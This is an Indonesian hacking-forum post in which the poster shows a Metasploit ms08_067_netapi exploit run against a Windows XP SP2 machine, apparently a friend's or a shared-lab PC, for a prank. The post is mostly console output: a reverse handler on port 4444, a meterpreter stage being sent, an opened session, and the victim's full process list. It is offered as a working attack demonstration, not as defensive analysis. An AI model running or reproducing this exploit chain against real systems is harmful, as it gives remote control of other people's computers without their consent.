Exploit Windows ga pake Backdoor + ngerjain temen
#12
Punya sy jadi pak ..

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.5.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.5.7
[*] Meterpreter session 1 opened (192.168.5.2:4444 -> 192.168.5.7:1285) at 2012-02-03 23:29:07 +0700

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1088 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1212 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1284 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1368 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
1416 firefox.exe x86 0 CLIENT-08\Owner C:\Program Files\Mozilla Firefox\firefox.exe
1452 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1508 sched.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\sched.exe
1720 TuneUpUtilitiesApp32.exe x86 0 CLIENT-08\Owner C:\Program Files\TuneUp Utilities 2012\TuneUpUtilitiesApp32.exe
1736 FrzState2k.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
1792 explorer.exe x86 0 CLIENT-08\Owner C:\WINDOWS\Explorer.EXE
1884 igfxpers.exe x86 0 CLIENT-08\Owner C:\WINDOWS\system32\igfxpers.exe
1892 avgnt.exe x86 0 CLIENT-08\Owner C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
1916 igfxsrvc.exe x86 0 CLIENT-08\Owner C:\WINDOWS\system32\igfxsrvc.exe
1932 client008.exe x86 0 CLIENT-08\Owner C:\Program Files\Client008\client008.exe
2116 update.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\update.exe
228 avguard.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\avguard.exe
3420 Adobe_Updater.exe x86 0 CLIENT-08\Owner C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
376 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
4 System x86 0 NT AUTHORITY\SYSTEM
552 TuneUpUtilitiesService32.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\TuneUp Utilities 2012\TuneUpUtilitiesService32.exe
576 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
620 avshadow.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
624 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
648 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
692 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
728 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
876 DF5Serv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
916 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
992 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe

meterpreter >
Fuckbook
Geeky's Blog!
Yahoo Massager : Mac_geeky

Acer 4732z
Backtrack 5 Gnome


Messages In This Thread
RE: Exploit Windows ga pake Backdoor + ngerjain temen - by geeky - 02-03-2012, 04:34 PM




Users browsing this thread: 2 Guest(s)